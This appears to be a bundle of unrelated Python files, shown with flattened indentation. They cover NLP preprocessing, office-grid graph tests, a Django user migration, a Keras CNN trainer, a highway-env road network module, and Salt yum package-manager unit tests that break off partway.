if cross_val or train_dev_split > 0:
results.append(data_dev)
if len(results) == 1:
return results[0]
else:
return tuple(results)
def to_index(self, data):
# sample = data[0]
# fea_num=len(sample)
seq_fea_num=len(self.all_dicts)
data_index = []
for example in data:
single_fea=example[seq_fea_num:]
ex_list=[[] for i in range(seq_fea_num)]
for fea in zip(*example[:seq_fea_num]):
for i,char in enumerate(fea):
if i==0:
dic_=self.all_dicts["sent"]
else:
dic_ = self.all_dicts["fea_"+str(i)]
if char in dic_:
ex_list[i].append(dic_[char])
else:
ex_list[i].append(dic_["<unk>"])
data_index.append(ex_list)
data_index[-1].extend(single_fea)
return data_index
def build_reverse_dict(self, all_dict):
rev_dicts={}
for dic_name in all_dict:
rev_dicts[dic_name]={all_dict[dic_name][w]:w for w in all_dict[dic_name]}
return rev_dicts
class ClassPreprocess(BasePreprocess):
""" Preprocess pipeline for classification datasets.
Preprocess pipeline, including building mapping from words to index, from index to words,
from labels/classes to index, from index to labels/classes.
design for data of three-level list which has a single label in each sample.
::
[
[ [word_11, word_12, ...], label_1 ],
[ [word_21, word_22, ...], label_2 ],
...
]
"""
def __init__(self):
super(ClassPreprocess, self).__init__()
def build_dict(self, data):
"""Build vocabulary."""
# build vocabulary from scratch if nothing exists
word2index = DEFAULT_WORD_TO_INDEX.copy()
label2index = DEFAULT_WORD_TO_INDEX.copy()
# collect every word and label
for sent, label in data:
if len(sent) <= 1:
continue
if label not in label2index:
label2index[label] = len(label2index)
for word in sent:
if word not in word2index:
word2index[word] = len(word2index)
return word2index, label2index
def to_index(self, data):
"""Convert word strings and label strings into indices.
:param data: three-level list
::
[
[ [word_11, word_12, ...], label_1 ],
[ [word_21, word_22, ...], label_2 ],
...
]
:return data_index: the same shape as data, but each string is replaced by its corresponding index
"""
data_index = []
for example in data:
word_list = []
# example[0] is the word list, example[1] is the single label
for word in example[0]:
word_list.append(self.word2index.get(word, DEFAULT_WORD_TO_INDEX[DEFAULT_UNKNOWN_LABEL]))
label_index = self.label2index.get(example[1], DEFAULT_WORD_TO_INDEX[DEFAULT_UNKNOWN_LABEL])
data_index.append([word_list, label_index])
return data_index
def infer_preprocess(pickle_path, data):
"""Preprocess over inference data. Transform three-level list of strings into that of index.
::
[
[word_11, word_12, ...],
[word_21, word_22, ...],
...
]
"""
word2index = load_pickle(pickle_path, "word2id.pkl")
data_index = []
for example in data:
data_index.append([word2index.get(w, DEFAULT_UNKNOWN_LABEL) for w in example])
return data_index
|
import unittest
from ospacial.officegraph import OfficeGraph
class TestOfficeGraph(unittest.TestCase):
def setUp(self):
# rank = 10
self.og10 = OfficeGraph(10)
# rank = 5
self.og5 = OfficeGraph(5)
# id of node representing food truck
def test_target_id(self):
# target = rank ** 2
self.assertEqual(100, self.og10.target)
self.assertEqual(25, self.og5.target)
# Grid of 100 desks and 1 food truck
def test_num_nodes(self):
# num = rank ** 2 + 1
self.assertEqual(101, len(self.og10.graph.nodes()))
self.assertEqual(26, len(self.og5.graph.nodes()))
def test_back_row(self):
# range(0, rank)
self.assertEqual(set(range(10)), self.og10.back_row())
self.assertEqual(set(range(5)), self.og5.back_row())
def test_all_desks(self):
# range (0, rank ** 2)
self.assertEqual(set(range(100)), self.og10.all_desks())
self.assertEqual(set(range(25)), self.og5.all_desks())
# all desks in the front row can reach the food truck
def test_front_row_can_reach_target(self):
# front row is range(rank * (rank - 1), rank ** 2)
for n in range(90, 100):
self.assertTrue(100 in self.og10.graph.neighbors(n))
for n in range(20, 25):
self.assertTrue(25 in self.og5.graph.neighbors(n))
# no other desk can reach food truck directly
def test_other_rows_cant_reach_target(self):
# other rows are range(0, rank * (rank - 1))
for n in range(0, 90):
self.assertFalse(100 in self.og10.graph.neighbors(n))
for n in range(0, 20):
self.assertFalse(25 in self.og5.graph.neighbors(n))
# can go between rows
def test_can_move_front_back(self):
# n - rank and n + rank
self.assertTrue(32 in self.og10.graph.neighbors(42))
self.assertTrue(52 in self.og10.graph.neighbors(42))
# can go between columns
def test_can_move_left_right(self):
# n - 1 and n + 1
self.assertTrue(41 in self.og10.graph.neighbors(42))
self.assertTrue(43 in self.og10.graph.neighbors(42))
# can't go diagonally
def test_cant_move_diagonally(self):
# n +/- rank +/- 1
self.assertFalse(31 in self.og10.graph.neighbors(42))
self.assertFalse(33 in self.og10.graph.neighbors(42))
self.assertFalse(51 in self.og10.graph.neighbors(42))
self.assertFalse(53 in self.og10.graph.neighbors(42))
def assertNeighboursOf(self, og, node_list, neighbours_of):
self.assertEqual(set(node_list), set(og.graph.neighbors(neighbours_of)))
# you can move between desks in the same row or column, but not diagonally
# here we check a set of neighbours is exactly as expected for different areas
def test_valid_move_scenarios(self):
# start corner
self.assertNeighboursOf(self.og10, [1, 10], 0)
# start row and col
self.assertNeighboursOf(self.og10, [0, 11, 20], 10)
self.assertNeighboursOf(self.og10, [0, 2, 11], 1)
# middle
self.assertNeighboursOf(self.og10, [5, 14, 16, 25], 15)
self.assertNeighboursOf(self.og10, [53, 62, 64, 73], 63)
# other corner
self.assertNeighboursOf(self.og10, [8, 19], 9)
# last row
self.assertNeighboursOf(self.og10, [80, 91, 100], 90)
self.assertNeighboursOf(self.og10, [88, 97, 99, 100], 98)
# if a desk is occupied, you can no longer move to that desk
# here we check a set of neighbours is exactly as expected in region of occupied desk
def test_valid_move_scenarios_when_apply_occupancy(self):
self.og10.apply_occupancy([53, 98])
self.assertNeighboursOf(self.og10, [62, 64, 73], 63)
self.assertNeighboursOf(self.og10, [42, 51, 62], 52)
self.assertNeighboursOf(self.og10, [78, 87, 89], 88)
self.assertNeighboursOf(self.og10, [89, 100], 99)
def test_hot_list(self):
self.og5.apply_occupancy(range(20, 25))
hl = self.og5.hot_list()
self.assertEqual(sum(hl), 20)
self.assertEqual(sum(hl[:-5]), 20)
self.assertEqual(sum(hl[20:]), 0)
if __name__ == '__main__':
unittest.main()
|
<filename>users/migrations/0001_initial.py
# Generated by Django 2.1.7 on 2019-03-05 14:22
from django.db import migrations, models
import django.db.models.deletion
import users.models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0009_alter_user_last_name_max_length'),
('location', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('email', models.EmailField(max_length=254, unique=True, verbose_name='email address')),
('first_name', models.CharField(blank=True, max_length=30, verbose_name='first name')),
('last_name', models.CharField(blank=True, max_length=30, verbose_name='last name')),
('date_joined', models.DateTimeField(auto_now_add=True, verbose_name='date joined')),
('is_active', models.BooleanField(default=True, verbose_name='active')),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff')),
('share_email', models.BooleanField(default=False)),
('share_phone', models.BooleanField(default=False)),
('phone_number', models.CharField(blank=True, max_length=20, null=True)),
('mobile_phone_number', models.CharField(blank=True, max_length=20, null=True)),
('org_name', models.CharField(blank=True, max_length=128, null=True, verbose_name='organization name')),
('profile_picture', models.ImageField(blank=True, null=True, upload_to='users/user/profile-picture')),
('postal_code', models.CharField(blank=True, max_length=32, null=True)),
('address', models.CharField(blank=True, max_length=256, null=True)),
('number', models.CharField(blank=True, max_length=32, null=True)),
('complement', models.CharField(blank=True, max_length=128, null=True)),
('district', models.CharField(blank=True, max_length=128, null=True)),
('url_facebook_profile', models.URLField(blank=True, null=True, verbose_name='Profile Facebook URL')),
('url_facebook_page', models.URLField(blank=True, null=True, verbose_name='Page Facebook URL')),
('url_twitter', models.URLField(blank=True, null=True, verbose_name='Twitter URL')),
('url_instagram', models.URLField(blank=True, null=True, verbose_name='Instagram URL')),
('city', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='users', to='location.City')),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'verbose_name': 'user',
'verbose_name_plural': 'users',
},
managers=[
('objects', users.models.UserManager()),
],
),
]
|
import os
import tensorflow as tf
from tensorflow.keras import layers, models
import matplotlib.pyplot as plt
import numpy as np
class CNN_B1(object):
def __init__(self):
model = models.Sequential()
model.add(layers.Conv2D(32, (5,5), activation='relu', input_shape=(100, 100, 3) ))
model.add(layers.MaxPooling2D((2,2)))
model.add(layers.Dropout(0.1))
model.add(layers.Conv2D(64, (5,5), activation='relu'))
model.add(layers.MaxPooling2D((2,2)))
model.add(layers.Dropout(0.5))
model.add(layers.Conv2D(64,(3,3), activation='relu'))
model.add(layers.Flatten())
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(5, activation='softmax'))
model.summary()
self.model = model
class Utils_B1:
def __init__(self):
print("Processing task B1")
self.cnn = CNN_B1()
def train(self, train_imgs, train_labels):
# Optional: Function to plot learning curves
def plot_curve(title, train_val, train_loss, val_val, val_loss, num_epoch, axes=None, ylim=None):
num = np.linspace(1, num_epoch, num_epoch)
axes[0].set_title(title)
if ylim is not None:
axes[0].set_ylim(*ylim)
axes[0].set_xticks(num)
axes[0].set_xlabel("Number of epochs")
axes[0].set_ylabel("Score")
axes[0].grid()
axes[0].plot(num, train_val, 'o-', color="r",
label="Training score")
axes[0].plot(num, val_val, 'o-', color="g",
label="Cross-validation score")
axes[0].legend(loc="best")
axes[1].grid()
axes[1].plot(num, train_loss, 'o-', color="r",
label="Training loss")
axes[1].plot(num, val_loss, 'o-', color="g",
label="Cross-validation loss")
axes[1].legend(loc="best")
axes[1].set_title("Training Loss v.s. Validation Loss")
axes[1].set_xticks(num)
axes[1].set_xlabel("Number of epochs")
axes[1].set_ylabel("Loss")
plt.show()
return plt
num_epochs, val_split = 8, 0.2
self.cnn.model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
hist = self.cnn.model.fit(train_imgs, train_labels, epochs=num_epochs, validation_split=val_split, shuffle=True)
# Optional: Plot learning curves
# fig, axes = plt.subplots(1,2, figsize=(20,5))
# plot_curve("Learning Curve(CNN)",
# hist.history['accuracy'],
# hist.history['loss'],
# hist.history['val_accuracy'],
# hist.history['val_loss'],
# num_epochs,
# axes, ylim=(0.0, 1.01))
return hist.history['val_accuracy'][-1], hist.history['val_loss'][-1]
def test(self, test_imgs, test_labels):
test_loss, test_acc = self.cnn.model.evaluate(test_imgs, test_labels, verbose=0)
print("Test Accuracy: %.4f, test on %d images" % (test_acc, len(test_labels)))
return test_acc, test_loss
|
<filename>highway_env/road/road.py
import numpy as np
import pandas as pd
import logging
from typing import List, Tuple, Dict, TYPE_CHECKING, Optional
from highway_env.logger import Loggable
from highway_env.road.lane import LineType, StraightLane, AbstractLane
if TYPE_CHECKING:
from highway_env.vehicle import kinematics
from highway_env.road import objects
logger = logging.getLogger(__name__)
LaneIndex = Tuple[str, str, int]
Route = List[LaneIndex]
class RoadNetwork(object):
graph: Dict[str, Dict[str, List[AbstractLane]]]
def __init__(self):
self.graph = {}
def add_lane(self, _from: str, _to: str, lane: AbstractLane) -> None:
"""
A lane is encoded as an edge in the road network.
:param _from: the node at which the lane starts.
:param _to: the node at which the lane ends.
:param AbstractLane lane: the lane geometry.
"""
if _from not in self.graph:
self.graph[_from] = {}
if _to not in self.graph[_from]:
self.graph[_from][_to] = []
self.graph[_from][_to].append(lane)
def get_lane(self, index: LaneIndex) -> AbstractLane:
"""
Get the lane geometry corresponding to a given index in the road network.
:param index: a tuple (origin node, destination node, lane id on the road).
:return: the corresponding lane geometry.
"""
_from, _to, _id = index
if _id is None and len(self.graph[_from][_to]) == 1:
_id = 0
return self.graph[_from][_to][_id]
def get_closest_lane_index(self, position: np.ndarray) -> LaneIndex:
"""
Get the index of the lane closest to a world position.
:param position: a world position [m].
:return: the index of the closest lane.
"""
indexes, distances = [], []
for _from, to_dict in self.graph.items():
for _to, lanes in to_dict.items():
for _id, l in enumerate(lanes):
distances.append(l.distance(position))
indexes.append((_from, _to, _id))
return indexes[int(np.argmin(distances))]
def next_lane(self, current_index: LaneIndex, route: Route = None, position: np.ndarray = None,
np_random: np.random.RandomState = np.random) -> LaneIndex:
"""
Get the index of the next lane that should be followed after finishing the current lane.
If a plan is available and matches with current lane, follow it.
Else, pick next road randomly.
If it has the same number of lanes as current road, stay in the same lane.
Else, pick next road's closest lane.
:param current_index: the index of the current lane.
:param route: the planned route, if any.
:param position: the vehicle position.
:param np_random: a source of randomness.
:return: the index of the next lane to be followed when current lane is finished.
"""
_from, _to, _id = current_index
next_to = None
# Pick next road according to planned route
if route:
if route[0][:2] == current_index[:2]: # We just finished the first step of the route, drop it.
route.pop(0)
if route and route[0][0] == _to: # Next road in route is starting at the end of current road.
_, next_to, route_id = route[0]
elif route:
logger.warning("Route {} does not start after current road {}.".format(route[0], current_index))
# Randomly pick next road
if not next_to:
try:
next_to = list(self.graph[_to].keys())[np_random.randint(len(self.graph[_to]))]
except KeyError:
# logger.warning("End of lane reached.")
return current_index
# If next road has same number of lane, stay on the same lane
if len(self.graph[_from][_to]) == len(self.graph[_to][next_to]):
next_id = _id
# Else, pick closest lane
else:
lanes = range(len(self.graph[_to][next_to]))
next_id = min(lanes,
key=lambda l: self.get_lane((_to, next_to, l)).distance(position))
return _to, next_to, next_id
def bfs_paths(self, start: str, goal: str) -> List[List[str]]:
"""
Breadth-first search of all routes from start to goal.
:param start: starting node
:param goal: goal node
:return: list of paths from start to goal.
"""
queue = [(start, [start])]
while queue:
(node, path) = queue.pop(0)
if node not in self.graph:
yield []
for _next in set(self.graph[node].keys()) - set(path):
if _next == goal:
yield path + [_next]
elif _next in self.graph:
queue.append((_next, path + [_next]))
def shortest_path(self, start: str, goal: str) -> List[str]:
"""
Breadth-first search of shortest path from start to goal.
:param start: starting node
:param goal: goal node
:return: shortest path from start to goal.
"""
return next(self.bfs_paths(start, goal), [])
def all_side_lanes(self, lane_index: LaneIndex) -> List[LaneIndex]:
"""
:param lane_index: the index of a lane.
:return: all lanes belonging to the same road.
"""
return [(lane_index[0], lane_index[1], i) for i in range(len(self.graph[lane_index[0]][lane_index[1]]))]
def side_lanes(self, lane_index: LaneIndex) -> List[LaneIndex]:
"""
:param lane_index: the index of a lane.
:return: indexes of lanes next to a an input lane, to its right or left.
"""
_from, _to, _id = lane_index
lanes = []
if _id > 0:
lanes.append((_from, _to, _id - 1))
if _id < len(self.graph[_from][_to]) - 1:
lanes.append((_from, _to, _id + 1))
return lanes
@staticmethod
def is_same_road(lane_index_1: LaneIndex, lane_index_2: LaneIndex, same_lane: bool = False) -> bool:
"""
Is lane 1 in the same road as lane 2?
"""
return lane_index_1[:2] == lane_index_2[:2] and (not same_lane or lane_index_1[2] == lane_index_2[2])
@staticmethod
def is_leading_to_road(lane_index_1: LaneIndex, lane_index_2: LaneIndex, same_lane: bool = False) -> bool:
"""
Is lane 1 leading to of lane 2?
"""
return lane_index_1[1] == lane_index_2[0] and (not same_lane or lane_index_1[2] == lane_index_2[2])
def is_connected_road(self, lane_index_1: LaneIndex, lane_index_2: LaneIndex, route: Route = None,
same_lane: bool = False, depth: int = 0) -> bool:
"""
Is the lane 2 leading to a road within lane 1's route?
Vehicles on these lanes must be considered for collisions.
:param lane_index_1: origin lane
:param lane_index_2: target lane
:param route: route from origin lane, if any
:param same_lane: compare lane id
:param depth: search depth from lane 1 along its route
:return: whether the roads are connected
"""
if RoadNetwork.is_same_road(lane_index_2, lane_index_1, same_lane) \
or RoadNetwork.is_leading_to_road(lane_index_2, lane_index_1, same_lane):
return True
if depth > 0:
if route and route[0][:2] == lane_index_1[:2]:
# Route is starting at current road, skip it
return self.is_connected_road(lane_index_1, lane_index_2, route[1:], same_lane, depth)
elif route and route[0][0] == lane_index_1[1]:
# Route is continuing from current road, follow it
return self.is_connected_road(route[0], lane_index_2, route[1:], same_lane, depth - 1)
else:
# Recursively search all roads at intersection
_from, _to, _id = lane_index_1
return any([self.is_connected_road((_to, l1_to, _id), lane_index_2, route, same_lane, depth - 1)
for l1_to in self.graph.get(_to, {}).keys()])
return False
def lanes_list(self) -> List[AbstractLane]:
return [lane for to in self.graph.values() for ids in to.values() for lane in ids]
@staticmethod
def straight_road_network(lanes: int = 4, length: float = 10000, angle: float = 0) -> 'RoadNetwork':
net = RoadNetwork()
for lane in range(lanes):
origin = np.array([0, lane * StraightLane.DEFAULT_WIDTH])
end = np.array([length, lane * StraightLane.DEFAULT_WIDTH])
rotation = np.array([[np.cos(angle), np.sin(angle)], [-np.sin(angle), np.cos(angle)]])
origin = rotation @ origin
end = rotation @ end
line_types = [LineType.CONTINUOUS_LINE if lane == 0 else LineType.STRIPED,
LineType.CONTINUOUS_LINE if lane == lanes - 1 else LineType.NONE]
net.add_lane("0", "1", StraightLane(origin, end, line_types=line_types))
return net
def position_heading_along_route(self, route: Route, longitudinal: float, lateral: float) \
-> Tuple[np.ndarray, float]:
"""
Get the absolute position and heading along a route composed of several lanes at some local coordinates.
:param route: a planned route, list of lane indexes
:param longitudinal: longitudinal position
:param lateral: : lateral position
:return: position, heading
"""
while len(route) > 1 and longitudinal > self.get_lane(route[0]).length:
longitudinal -= self.get_lane(route[0]).length
route = route[1:]
return self.get_lane(route[0]).position(longitudinal, lateral), self.get_lane(route[0]).heading_at(longitudinal)
class Road(Loggable):
"""
A road is a set of lanes, and a set of vehicles driving on these lanes
"""
def __init__(self,
network: RoadNetwork = None,
vehicles: List['kinematics.Vehicle'] = None,
road_objects: List['objects.RoadObject'] = None,
np_random: np.random.RandomState = None,
record_history: bool = False) -> None:
"""
New road.
:param network: the road network describing the lanes
:param vehicles: the vehicles driving on the road
:param road_objects: the objects on the road including obstacles and landmarks
:param np.random.RandomState np_random: a random number generator for vehicle behaviour
:param record_history: whether the recent trajectories of vehicles should be recorded for display
"""
self.network = network
self.vehicles = vehicles or []
self.objects = road_objects or []
self.np_random = np_random if np_random else np.random.RandomState()
self.record_history = record_history
def close_vehicles_to(self, vehicle: 'kinematics.Vehicle', distance: float, count: int = None,
see_behind: bool = True) -> object:
vehicles = [v for v in self.vehicles
if np.linalg.norm(v.position - vehicle.position) < distance
and v is not vehicle
and (see_behind or -2 * vehicle.LENGTH < vehicle.lane_distance_to(v))]
vehicles = sorted(vehicles, key=lambda v: abs(vehicle.lane_distance_to(v)))
if count:
vehicles = vehicles[:count]
return vehicles
def act(self) -> None:
"""
Decide the actions of each entity on the road.
"""
for vehicle in self.vehicles:
vehicle.act()
def step(self, dt: float) -> None:
"""
Step the dynamics of each entity on the road.
:param dt: timestep [s]
"""
for vehicle in self.vehicles:
vehicle.step(dt)
# TODO: create a shallow copy of vehicles list(vehicle.copy()) and pop crashed vehicles from it to reduce
# complexity and prevent multiple checks
for vehicle in self.vehicles:
for other in self.vehicles:
vehicle.check_collision(other)
for other in self.objects:
vehicle.check_collision(other)
def neighbour_vehicles(self, vehicle: 'kinematics.Vehicle', lane_index: LaneIndex = None) \
-> Tuple[Optional['kinematics.Vehicle'], Optional['kinematics.Vehicle']]:
"""
Find the preceding and following vehicles of a given vehicle.
:param vehicle: the vehicle whose neighbours must be found
:param lane_index: the lane on which to look for preceding and following vehicles.
It doesn't have to be the current vehicle lane but can also be another lane, in which case the
vehicle is projected on it considering its local coordinates in the lane.
:return: its preceding vehicle, its following vehicle
"""
lane_index = lane_index or vehicle.lane_index
if not lane_index:
return None, None
lane = self.network.get_lane(lane_index)
s = self.network.get_lane(lane_index).local_coordinates(vehicle.position)[0]
s_front = s_rear = None
v_front = v_rear = None
for v in self.vehicles + self.objects:
if v is not vehicle and True: # self.network.is_connected_road(v.lane_index, lane_index, same_lane=True):
s_v, lat_v = lane.local_coordinates(v.position)
if not lane.on_lane(v.position, s_v, lat_v, margin=1):
continue
if s <= s_v and (s_front is None or s_v <= s_front):
s_front = s_v
v_front = v
if s_v < s and (s_rear is None or s_v > s_rear):
s_rear = s_v
v_rear = v
return v_front, v_rear
def dump(self) -> None:
"""
Dump the data of all entities on the road
"""
for v in self.vehicles:
v.dump()
def get_log(self) -> pd.DataFrame:
"""
Concatenate the logs of all entities on the road.
:return: the concatenated log.
"""
return pd.concat([v.get_log() for v in self.vehicles])
def __repr__(self):
return self.vehicles.__repr__()
|
# -*- coding: utf-8 -*-
# Import Python Libs
from __future__ import absolute_import
# Import Salt Testing Libs
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import TestCase, skipIf
from tests.support.mock import (
Mock,
MagicMock,
patch,
NO_MOCK,
NO_MOCK_REASON
)
# Import Salt libs
import salt.modules.yumpkg as yumpkg
LIST_REPOS = {
'base': {
'file': '/etc/yum.repos.d/CentOS-Base.repo',
'gpgcheck': '1',
'gpgkey': 'file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7',
'mirrorlist': 'http://mirrorlist.centos.org/?release=$releasever&arch=$basearch&repo=os&infra=$infra',
'name': 'CentOS-$releasever - Base'
},
'base-source': {
'baseurl': 'http://vault.centos.org/centos/$releasever/os/Source/',
'enabled': '0',
'file': '/etc/yum.repos.d/CentOS-Sources.repo',
'gpgcheck': '1',
'gpgkey': 'file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7',
'name': 'CentOS-$releasever - Base Sources'
},
'updates': {
'file': '/etc/yum.repos.d/CentOS-Base.repo',
'gpgcheck': '1',
'gpgkey': 'file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7',
'mirrorlist': 'http://mirrorlist.centos.org/?release=$releasever&arch=$basearch&repo=updates&infra=$infra',
'name': 'CentOS-$releasever - Updates'
},
'updates-source': {
'baseurl': 'http://vault.centos.org/centos/$releasever/updates/Source/',
'enabled': '0',
'file': '/etc/yum.repos.d/CentOS-Sources.repo',
'gpgcheck': '1',
'gpgkey': 'file:///<KEY>',
'name': 'CentOS-$releasever - Updates Sources'
}
}
@skipIf(NO_MOCK, NO_MOCK_REASON)
class YumTestCase(TestCase, LoaderModuleMockMixin):
'''
Test cases for salt.modules.yumpkg
'''
def setup_loader_modules(self):
return {
yumpkg: {
'__context__': {
'yum_bin': 'yum',
},
'__grains__': {
'osarch': 'x86_64',
'os_family': 'RedHat',
'osmajorrelease': 7,
},
}
}
def test_latest_version_with_options(self):
with patch.object(yumpkg, 'list_pkgs', MagicMock(return_value={})):
# with fromrepo
cmd = MagicMock(return_value={'retcode': 0, 'stdout': ''})
with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
yumpkg.latest_version(
'foo',
refresh=False,
fromrepo='good',
branch='foo')
cmd.assert_called_once_with(
['yum', '--quiet', '--disablerepo=*', '--enablerepo=good',
'--branch=foo', 'list', 'available', 'foo'],
ignore_retcode=True,
output_loglevel='trace',
python_shell=False)
# without fromrepo
cmd = MagicMock(return_value={'retcode': 0, 'stdout': ''})
with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
yumpkg.latest_version(
'foo',
refresh=False,
enablerepo='good',
disablerepo='bad',
branch='foo')
cmd.assert_called_once_with(
['yum', '--quiet', '--disablerepo=bad', '--enablerepo=good',
'--branch=foo', 'list', 'available', 'foo'],
ignore_retcode=True,
output_loglevel='trace',
python_shell=False)
def test_list_repo_pkgs_with_options(self):
'''
Test list_repo_pkgs with and without fromrepo
NOTE: mock_calls is a stack. The most recent call is indexed
with 0, while the first call would have the highest index.
'''
really_old_yum = MagicMock(return_value='3.2.0')
older_yum = MagicMock(return_value='3.4.0')
newer_yum = MagicMock(return_value='3.4.5')
list_repos_mock = MagicMock(return_value=LIST_REPOS)
kwargs = {'output_loglevel': 'trace',
'ignore_retcode': True,
'python_shell': False}
with patch.object(yumpkg, 'list_repos', list_repos_mock):
# Test with really old yum. The fromrepo argument has no effect on
# the yum commands we'd run.
with patch.dict(yumpkg.__salt__, {'cmd.run': really_old_yum}):
cmd = MagicMock(return_value={'retcode': 0, 'stdout': ''})
with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
yumpkg.list_repo_pkgs('foo')
# We should have called cmd.run_all twice
self.assertEqual(len(cmd.mock_calls), 2)
# Check args from first call
self.assertEqual(
cmd.mock_calls[1][1],
(['yum', '--quiet', 'list', 'available'],)
)
# Check kwargs from first call
self.assertEqual(cmd.mock_calls[1][2], kwargs)
# Check args from second call
self.assertEqual(
cmd.mock_calls[0][1],
(['yum', '--quiet', 'list', 'installed'],)
)
# Check kwargs from second call
self.assertEqual(cmd.mock_calls[0][2], kwargs)
# Test with really old yum. The fromrepo argument has no effect on
# the yum commands we'd run.
with patch.dict(yumpkg.__salt__, {'cmd.run': older_yum}):
cmd = MagicMock(return_value={'retcode': 0, 'stdout': ''})
with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
yumpkg.list_repo_pkgs('foo')
# We should have called cmd.run_all twice
self.assertEqual(len(cmd.mock_calls), 2)
# Check args from first call
self.assertEqual(
cmd.mock_calls[1][1],
(['yum', '--quiet', '--showduplicates', 'list', 'available'],)
)
# Check kwargs from first call
self.assertEqual(cmd.mock_calls[1][2], kwargs)
# Check args from second call
self.assertEqual(
cmd.mock_calls[0][1],
(['yum', '--quiet', '--showduplicates', 'list', 'installed'],)
)
# Check kwargs from second call
self.assertEqual(cmd.mock_calls[0][2], kwargs)
# Test with newer yum. We should run one yum command per repo, so
# fromrepo would limit how many calls we make.
with patch.dict(yumpkg.__salt__, {'cmd.run': newer_yum}):
# When fromrepo is used, we would only run one yum command, for
# that specific repo.
cmd = MagicMock(return_value={'retcode': 0, 'stdout': ''})
with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
yumpkg.list_repo_pkgs('foo', fromrepo='base')
# We should have called cmd.run_all once
self.assertEqual(len(cmd.mock_calls), 1)
# Check args
self.assertEqual(
cmd.mock_calls[0][1],
(['yum', '--quiet', '--showduplicates',
'repository-packages', 'base', 'list', 'foo'],)
)
# Check kwargs
self.assertEqual(cmd.mock_calls[0][2], kwargs)
# Test enabling base-source and disabling updates. We should
# get two calls, one for each enabled repo. Because dict
# iteration order will vary, different Python versions will be
# do them in different orders, which is OK, but it will just
# mean that we will have to check both the first and second
# mock call both times.
cmd = MagicMock(return_value={'retcode': 0, 'stdout': ''})
with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
yumpkg.list_repo_pkgs(
'foo',
enablerepo='base-source',
disablerepo='updates')
# We should have called cmd.run_all twice
self.assertEqual(len(cmd.mock_calls), 2)
for repo in ('base', 'base-source'):
for index in (0, 1):
try:
# Check args
self.assertEqual(
cmd.mock_calls[index][1],
(['yum', '--quiet', '--showduplicates',
'repository-packages', repo, 'list',
'foo'],)
)
# Check kwargs
self.assertEqual(cmd.mock_calls[index][2], kwargs)
break
except AssertionError:
continue
else:
self.fail("repo '{0}' not checked".format(repo))
def test_list_upgrades_dnf(self):
'''
The subcommand should be "upgrades" with dnf
'''
with patch.dict(yumpkg.__context__, {'yum_bin': 'dnf'}):
# with fromrepo
cmd = MagicMock(return_value={'retcode': 0, 'stdout': ''})
with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
yumpkg.list_upgrades(
refresh=False,
fromrepo='good',
branch='foo')
cmd.assert_called_once_with(
['dnf', '--quiet', '--disablerepo=*', '--enablerepo=good',
'--branch=foo', 'list', 'upgrades'],
output_loglevel='trace',
ignore_retcode=True,
python_shell=False)
# without fromrepo
cmd = MagicMock(return_value={'retcode': 0, 'stdout': ''})
with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
yumpkg.list_upgrades(
refresh=False,
enablerepo='good',
disablerepo='bad',
branch='foo')
cmd.assert_called_once_with(
['dnf', '--quiet', '--disablerepo=bad', '--enablerepo=good',
'--branch=foo', 'list', 'upgrades'],
output_loglevel='trace',
ignore_retcode=True,
python_shell=False)
def test_list_upgrades_yum(self):
'''
The subcommand should be "updates" with yum
'''
# with fromrepo
cmd = MagicMock(return_value={'retcode': 0, 'stdout': ''})
with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
yumpkg.list_upgrades(
refresh=False,
fromrepo='good',
branch='foo')
cmd.assert_called_once_with(
['yum', '--quiet', '--disablerepo=*', '--enablerepo=good',
'--branch=foo', 'list', 'updates'],
output_loglevel='trace',
ignore_retcode=True,
python_shell=False)
# without fromrepo
cmd = MagicMock(return_value={'retcode': 0, 'stdout': ''})
with patch.dict(yumpkg.__salt__, {'cmd.run_all': cmd}):
yumpkg.list_upgrades(
refresh=False,
enablerepo='good',
disablerepo='bad',
branch='foo')
cmd.assert_called_once_with(
['yum', '--quiet', '--disablerepo=bad', '--enablerepo=good',
'--branch=foo', 'list', 'updates'],
output_loglevel='trace',
ignore_retcode=True,
python_shell=False)
def test_refresh_db_with_options(self):
with patch('salt.utils.pkg.clear_rtag', Mock()):
# With check_update=True we will do a cmd.run to run the clean_cmd, and
# then a separate cmd.retcode to check for updates.
# with fromrepo
clean_cmd = Mock()
update_cmd = MagicMock(return_value=0)
with patch.dict(yumpkg.__salt__, {'cmd.run': clean_cmd,
'cmd.retcode': update_cmd}):
yumpkg.refresh_db(
check_update=True,
fromrepo='good',
branch='foo')
clean_cmd.assert_called_once_with(
['yum', '--quiet', '--assumeyes', 'clean', 'expire-cache', '--disablerepo=*',
'--enablerepo=good', '--branch=foo'],
python_shell=False)
update_cmd.assert_called_once_with(
['yum', '--quiet', '--assumeyes', 'check-update',
'--setopt=autocheck_running_kernel=false', '--disablerepo=*',
'--enablerepo=good', '--branch=foo'],
output_loglevel='trace',
